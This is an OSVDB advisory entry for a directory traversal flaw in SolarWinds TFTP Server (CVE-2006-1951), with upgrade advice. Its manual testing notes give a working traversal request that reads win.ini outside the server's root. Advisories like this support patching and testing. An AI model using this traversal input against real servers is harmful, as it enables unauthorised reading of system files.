SolarWinds TFTP Server Traversal Arbitrary File Access

ID OSVDB:24992
Type osvdb
Reporter OSVDB
Modified 2006-04-21T12:17:34


Solution Description

Upgrade to version 8.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

$ tftp [target] tftp> get NUL/....//....//WINNT/win.ini Received 582 bytes in 0.0 seconds tftp> quit


Vendor URL: Secunia Advisory ID:19848 Other Advisory URL: Mail List Post: CVE-2006-1951